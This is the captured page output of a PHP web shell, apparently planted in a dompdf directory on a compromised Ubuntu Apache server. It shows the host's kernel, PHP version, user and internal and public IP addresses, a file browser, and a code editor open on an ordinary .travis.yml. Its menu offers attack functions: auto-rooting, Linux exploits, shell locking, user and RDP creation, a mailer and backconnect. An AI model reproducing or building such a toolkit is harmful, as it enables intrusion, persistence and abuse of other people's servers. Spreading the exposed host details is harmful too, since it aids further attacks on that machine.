Linux ip-172-26-7-228 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64
Apache
: 172.26.7.228 | : 18.116.13.192
Cant Read [ /etc/named.conf ]
5.6.40-24+ubuntu18.04.1+deb.sury.org+1
www-data
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
PrathibhaKaranji_stop /
dompdf /
[ HOME SHELL ]
Name
Size
Permission
Action
Baloo_Tamma
[ DIR ]
drwxr-xr-x
lib
[ DIR ]
drwxr-xr-x
src
[ DIR ]
drwxr-xr-x
.travis.yml
346
B
-rwxr-xr-x
CONTRIBUTING.md
2.96
KB
-rwxr-xr-x
LICENSE.LGPL
23.78
KB
-rwxr-xr-x
README.md
6.68
KB
-rwxr-xr-x
VERSION
5
B
-rwxr-xr-x
autoload.inc.php
1.02
KB
-rwxr-xr-x
composer.json
1.22
KB
-rwxr-xr-x
phpcs.xml
4.71
KB
-rwxr-xr-x
phpunit.xml.dist
493
B
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : .travis.yml
language: php php: - 5.4 - 5.5 - 5.6 - 7.0 - 7.1 - 7.2 - 7.3 - nightly - hhvm install: travis_retry composer install --no-interaction --prefer-source script: - vendor/bin/phpunit # - vendor/bin/phpcs --standard=phpcs.xml src matrix: allow_failures: - php: nightly - php: hhvm - php: 7.3 fast_finish: true
Close